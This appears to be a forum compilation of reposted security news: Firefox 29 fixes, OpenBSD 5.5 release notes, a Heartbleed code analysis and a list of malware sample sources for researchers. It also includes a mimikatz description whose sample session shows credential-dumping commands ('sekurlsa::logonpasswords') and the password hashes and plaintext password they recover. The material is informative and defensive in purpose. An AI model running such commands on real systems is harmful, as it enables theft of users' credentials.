Firefox 29 fixes several critical flaws, including memory safety bugs Mozilla rolled out Firefox 29 on Tuesday, a huge overhaul that addresses 15 security vulnerabilities, six of which are deemed critical, meaning the bug could be used to run attack code and install software with no user interaction aside from normal browsing. The critical vulnerabilities included three use-after-free bugs in nsHostResolve, imgLoader, and Text Track Manager for HTML video; a privilege escalation issue through Web Notification API, and two memory safety flaws in the browser engine and other Mozilla-based products, an advisory from the company said. Of note, the memory safety bugs ( CVE-2014-1518 and CVE-2014-1519) could allow remote attackers to launch denial-of-service attacks against users, or execute arbitrary code through "unknown vectors," the company warned. Sursa: Firefox 29 fixes several critical flaws, including memory safety bugs - SC Magazine

[h=2]OpenBSD 5.5[/h]eleased May 1, 2014 Copyright 1997-2014, Theo de Raadt. ISBN 978-0-9881561-3-5 5.5 Song: "Wrap in Time" Order a CDROM from our ordering system. See the information on the FTP page for a list of mirror machines. Go to the pub/OpenBSD/5.5/ directory on one of the mirror sites. Briefly read the rest of this document. Have a look at the 5.5 errata page for a list of bugs and workarounds. See a detailed log of changes between the 5.4 and 5.5 releases. 5.5 base signify pubkey: RWRGy8gxk9N9314J0gh9U02lA7s8i6ITajJiNgxQOndvXvM5ZPX+nQ9h 5.5 fw signify pubkey: RWTdVOhdk5qyNktv0iGV6OpaVfogGxTYc1bbkaUhFlExmclYvpJR/opO 5.5 pkg signify pubkey: RWQQC1M9dhm/tja/ktitJs/QVI1kGTQr7W7jtUmdZ4uTp+4yZJ6RRHb5 All applicable copyrights and credits can be found in the applicable file sources found in the files src.tar.gz, sys.tar.gz, xenocara.tar.gz, or in the files fetched via ports.tar.gz. The distribution files used to build packages from the ports.tar.gz file are not included on the CDROM because of lack of space. [h=3]What's New[/h] This is a partial list of new features and systems included in OpenBSD 5.5. For a comprehensive list, see the changelog leading to 5.5. Sursa: OpenBSD 5.5

[h=1]mimikatz[/h] mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... Download: https://github.com/gentilkiwi/mimikatz/

[h=1]Heartbleed – How Did Internet Security Almost Bleed Out?[/h] vince_kornacki Today marks the one month anniversary of the devastating Heartbleed vulnerability. Specifically, one month ago today Google first notified the OpenSSL development team of the vulnerability. From the start CVE-2014-0160 was not just another software vulnerability. No, this one was big. A vulnerability of epic proportion. Who would've thought that a simple buffer over-read could threaten to undermine the security of the Internet? As you know by now, Heartbleed allows attackers to read 64KB of server memory. What exactly is contained in that 64KB of server memory? Well that's a little random. Depending on the location of the heartbeat payload within server memory, the leak could reveal cryptographic keys, usernames and passwords, email messages, and a multitude of other sensitive information. How could this possibly happen? Looking back, a series of cascading failures is to blame. Let's start with the TLS Heartbeat Extension protocol defined in RFC 6520. The TLS Heartbeat Extension protocol is designed to maintain and verify a TLS connection without the need to renegotiate the connection every time. The client sends heartbeat payload to the server, and the server responds with the exact same heartbeat payload in order to verify the connection. But why was the heartbeat payload designed as a variable length field? And why would the heartbeat payload possibly need to be a whopping 64KB in length? Wouldn't a fixed length field of 64 bytes have been more than sufficient? Or was the heartbeat payload designed to covertly transfer Tolstoy's War And Peace? Defining a fixed length heartbeat payload field of 64 bytes would've simplified the application code and likely prevented the Heartbleed vulnerability. Ironically the "Security Considerations" section of RFC 6520 states that "this document does not introduce any new security considerations." Oops. What about the programmers? OpenSSL development is "volunteer-driven", and is performed by a staff of eight programmers. The developers perform an incredible service to the Internet at large, providing critical software that is used to secure electronic commerce, financial transactions, and everything else that must be encrypted over the World Wide Web. Recently a consortium of more than a dozen major technology corporations consisting of Amazon, Cisco, Dell, Facebook, Fujitsu, Google, IBM, Intel, Microsoft, NetApp, Rackspace, Qualcomm and VMWare pledged $100,000 per year for the next three years to help fund open source projects such as OpenSSL. Will this help solve the problem? Yes. Will this solve the problem completely? No. Technology corporations boast an impressive stable of well-paid developers, yet critical vulnerabilities are still identified within commercial software at an alarming rate. As long as programmers are human, mistakes will be made and critical vulnerabilities will be introduced into application code. What about the programming language? Like many open source software components, OpenSSL is written in the C programming language. One of the reasons that the C programming language is so powerful is because of direct memory management. C memory allocation and pointers allow programmers incredible control over program execution. Unfortunately, these very same features make the C programming languages extremely dangerous. Common C programming mistakes can lead to critical vulnerabilities such as buffer overflows and, in the case of the Heartbleed vulnerability, buffer over-reads. What about the application code? The vulnerable code was introduced with OpenSSL 1.0.1 on March 14, 2012. Depending on whether TLS or DTLS was utilized, the vulnerable code was located within the "tls1_process_heartbeat()" function of the "t1_lib.c" file or the "dtls1_process_heartbeat()" function of the "dl_both.c" file, respectively. Let's consider the "tls1_process_heartbeat()" function of the vulnerable "t1_lib.c" file. The function is called with an SSL data structure passed by reference: 2437 tls1_process_heartbeat(SSL *s)Later the "p" variable is initialized as a pointer to the heartbeat request, and the purported payload length is read from "p" into "payload": 2446 n2s(p, payload);Note that the actual payload length is never verified. The next line initializes the "pl" variable as a pointer to the payload: 2447 pl = p;Later "pl" is copied into "bp", a pointer to "buffer": 2469 memcpy(bp, pl, payload);Finally "3 + payload + padding" bytes of "buffer" are transmitted to the client: 2474 r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);Because the actual length of the payload received from the client is never verified, the client can send a single byte of payload but specify a payload length of 65,536 bytes, triggering the Heartbleed vulnerability and leaking 65,535 bytes of data stored within server memory. RFC 6520 actually states that the payload length must not exceed 2^14 bytes, but the payload length is stored in a 16-bit integer and this restriction is not enforced, so 2^16 bytes can be extracted from server memory. Worse yet, in order to improve performance OpenSSL developers utilized a custom freelist implementation instead of the standard "malloc()" and "free()" memory allocation functions. Consequently, the memory returned by the server is more likely to contain sensitive information. The patched version of the previously vulnerable "t1_lib.c" file adds proper bounds checking in order to prevent the buffer over-read and therefore eliminate the Heartbleed vulnerability. If the actual length of the payload received from the client is greater than the purported payload length, the heartbeat response is not sent: 2601 if (1 + 2 + payload + 16 > s->s3->rrec.length) 2602 return 0; /* silently discard per RFC 6520 sec. 4 */ What about disclosure? What a mess! According to the timeline compiled by Fairfax Media, Google first identified the Heartbleed vulnerability on or before March 21. However, Google did not report Heartbleed to the OpenSSL development team until April 1. Heartbleed was next identified by Finland's Codenomicon on April 2. However, Codenomicon did not report Heartbleed to the OpenSSL development team until April 7, although Codenomicon did report the vulnerability to the National Cyber Security Centre Finland on April 3. Upon learning that a second researcher had identified the Heartbleed vulnerability, the OpenSSL development team released a security advisory and patched software later the same day. In between the initial Google discovery on March 21 and the patched software released on April 7, several companies including Google, Facebook, and Akamai were notified of the vulnerability and shrewdly disabled the TLS Heartbeat Extension. However, other companies including Cisco, Yahoo, and Twitter were not notified and therefore were unable to disable the TLS Heartbeat Extension. Who else knew about the Heartbleed vulnerability since it was introduced with OpenSSL 1.0.1 on March 14, 2012? How did two separate researchers identify Heartbleed 12 days apart after the vulnerability lingered within the OpenSSL code for over two years? Why the bumpy vulnerability disclosure timeline? Suffice it to say that the Heartbleed vulnerability did not set the standard for responsible vulnerability disclosure. What about security awareness? Finally a bright spot! On April 5, Codenomicon purchased the Heartbleed.com domain, where it published details regarding the vulnerability on April 7. The information was thorough and well written, and the clever Heartbleed logo resonated with the media and Internet users alike: The Hearbleed vulnerabilty was all over the news. Sites like Wikipeida and XKCD did a fantastic job explaining the vulnerability to non-technical Internet users. Mashable compiled a list of passwords that needed to be changed immediately. And a myriad of sites allowed you to test arbitrary servers for the presence of the Heartbleed vulnerability. All things considered, Heartbleed security awarenesss was handled in an exemplary manner. So what now? Can we guarantee that Hearbleed will never happen again? No. Application code is still written by humans, so mistakes will be made. They are inevitable. However, it is crucial that the technology industry learns from Heartbleed in order to improve processes surrounding protocol design, software development, and vulnerabilty disclosure. Only then can the technology industry stop a series of casccading failures from resulting in another devastating security vulnerability. Sursa: Heartbleed – How Did Internet Security Almost Bleed Out? | Symantec Connect Community

[h=1]Malware Sample Sources for Researchers[/h] Malware researchers have the need to collect malware samples to research threat techniques and develop defenses. Researchers can collect such samples using honeypots. They can also download samples from known malicious URLs. They can also obtain malware samples from the following sources: Contagio Malware Dump: Free; password required KernelMode.info: Free; registration required Malshare: Free Malware.lu's AVCaesar: Free; registration required MalwareBlacklist: Free; registration required Malwr: Free; registration required NovCon Twitter EXE Parsing: Free; provides links to live sites; may include benign files NovCon Twitter EXE Parsing: Free; provides links to potentially-malicious executables shared on Twitter Open Malware: Free SecuBox Labs: Free Virusign: Free VirusShare: Free Be careful not to infect yourself when accessing and experimenting with malicious software! Thanks to Mila for outlining many of these sources in her blog posting on the topic. My other lists of on-line security resources outline Automated Malware Analysis Services and On-Line Tools for Malicious Website Lookups. Sursa: Malware Sample Sources for Researchers